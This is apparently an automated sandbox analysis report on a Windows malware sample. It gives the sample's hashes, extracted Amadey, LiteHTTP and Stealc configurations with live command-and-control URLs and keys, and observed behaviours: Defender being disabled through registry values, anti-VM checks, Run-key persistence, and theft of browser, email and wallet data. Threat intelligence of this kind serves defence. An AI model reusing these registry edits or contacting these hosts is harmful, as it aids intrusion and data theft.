Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 20:58
Static task
static1
General
-
Target
5c9465cda4.exe
-
Size
938KB
-
MD5
1fa9c173c6abaae5709ca4b88db07aa5
-
SHA1
dc77a5b0aeede04510ad4604ff58af13fd377609
-
SHA256
3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247
-
SHA512
8bf7ea16e4ac88460842de1ab9abeeccb930d1bd309a8d06e2e33fab96cdd8a6f7a001dede7eedbe3511cba20e8799591e45a1a00bb484899bc255f3af811534
-
SSDEEP
24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:OTvC/MTQYxsWR7a09
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/692-607-0x0000000000230000-0x000000000068E000-memory.dmp healer behavioral1/memory/692-608-0x0000000000230000-0x000000000068E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 9cd284ebb6.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 9cd284ebb6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 9cd284ebb6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 9cd284ebb6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 9cd284ebb6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 9cd284ebb6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 9cd284ebb6.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9cd284ebb6.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 9cd284ebb6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 9cd284ebb6.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f58873a636.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11eddf214e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 12d46c5e89.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b29e5d50da.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad172f5f1a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9cd284ebb6.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1664 powershell.exe 8 1464 powershell.exe 12 2736 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2176 powershell.exe 1664 powershell.exe 1464 powershell.exe 2736 powershell.exe 1556 powershell.exe 1556 powershell.exe 3016 powershell.exe 1612 powershell.exe 2280 powershell.exe 2268 powershell.exe -
Downloads MZ/PE file 19 IoCs
flow pid Process 139 1796 rapes.exe 4 1664 powershell.exe 8 1464 powershell.exe 12 2736 powershell.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 7 1796 rapes.exe 20 108 BitLockerToGo.exe 27 1632 BitLockerToGo.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000700000001c88e-694.dat net_reactor behavioral1/memory/3920-702-0x0000000000820000-0x0000000000880000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b29e5d50da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11eddf214e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b29e5d50da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f58873a636.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f58873a636.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad172f5f1a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad172f5f1a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 12d46c5e89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 12d46c5e89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11eddf214e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9cd284ebb6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9cd284ebb6.exe -
Executes dropped EXE 23 IoCs
pid Process 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 1796 rapes.exe 1048 ce4pMzk.exe 2884 zY9sqWs.exe 3000 f590126b2e.exe 2356 TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE 2608 483d2fa8a0d53818306efeb32d3.exe 2968 12d46c5e89.exe 1528 6dac4cad30.exe 1468 6dac4cad30.exe 2588 b29e5d50da.exe 2644 f58873a636.exe 2208 PcAIvJ0.exe 1304 11eddf214e.exe 2396 ad172f5f1a.exe 2784 38f8ad48e7.exe 692 9cd284ebb6.exe 3340 v6Oqdnc.exe 3628 MCxU5Fj.exe 3664 MCxU5Fj.exe 3836 ce4pMzk.exe 3920 mAtJWNv.exe 3964 mAtJWNv.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 12d46c5e89.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine b29e5d50da.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine f58873a636.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine ad172f5f1a.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 9cd284ebb6.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine 11eddf214e.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE -
Loads dropped DLL 64 IoCs
pid Process 1664 powershell.exe 1664 powershell.exe 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1464 powershell.exe 1464 powershell.exe 2736 powershell.exe 2736 powershell.exe 2644 WerFault.exe 2644 WerFault.exe 2644 WerFault.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1528 6dac4cad30.exe 2068 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 108 BitLockerToGo.exe 1796 rapes.exe 1796 rapes.exe 1644 WerFault.exe 1644 WerFault.exe 1644 WerFault.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1632 BitLockerToGo.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 3512 WerFault.exe 3512 WerFault.exe 3512 WerFault.exe 1796 rapes.exe 3628 MCxU5Fj.exe 3720 WerFault.exe 3720 WerFault.exe 3720 WerFault.exe 3720 WerFault.exe 3720 WerFault.exe 1796 rapes.exe 1796 rapes.exe 1796 rapes.exe 3920 mAtJWNv.exe 4044 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 9cd284ebb6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9cd284ebb6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\f590126b2e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106670101\\f590126b2e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106680121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\MURP0T6t\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\11eddf214e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106780101\\11eddf214e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\ad172f5f1a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106790101\\ad172f5f1a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\38f8ad48e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106800101\\38f8ad48e7.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\9cd284ebb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106810101\\9cd284ebb6.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a41f-70.dat autoit_exe behavioral1/files/0x000600000001c722-432.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 1796 rapes.exe 2356 TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE 2608 483d2fa8a0d53818306efeb32d3.exe 2968 12d46c5e89.exe 2588 b29e5d50da.exe 2644 f58873a636.exe 1304 11eddf214e.exe 2396 ad172f5f1a.exe 692 9cd284ebb6.exe 3340 v6Oqdnc.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1528 set thread context of 1468 1528 6dac4cad30.exe 67 PID 2968 set thread context of 108 2968 12d46c5e89.exe 72 PID 2588 set thread context of 1632 2588 b29e5d50da.exe 76 PID 3628 set thread context of 3664 3628 MCxU5Fj.exe 114 PID 3920 set thread context of 3964 3920 mAtJWNv.exe 118 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 2644 2884 WerFault.exe 40 2068 1528 WerFault.exe 66 2388 1468 WerFault.exe 67 1644 1304 WerFault.exe 85 3512 3340 WerFault.exe 111 3720 3628 WerFault.exe 113 4044 3920 WerFault.exe 117 -
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11eddf214e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad172f5f1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f590126b2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f58873a636.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 12d46c5e89.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6dac4cad30.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6dac4cad30.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b29e5d50da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c9465cda4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 38f8ad48e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 38f8ad48e7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 38f8ad48e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9cd284ebb6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 828 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2624 taskkill.exe 2712 taskkill.exe 1360 taskkill.exe 2292 taskkill.exe 2516 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a f58873a636.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 f58873a636.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a f58873a636.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2284 schtasks.exe 2220 schtasks.exe 2908 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
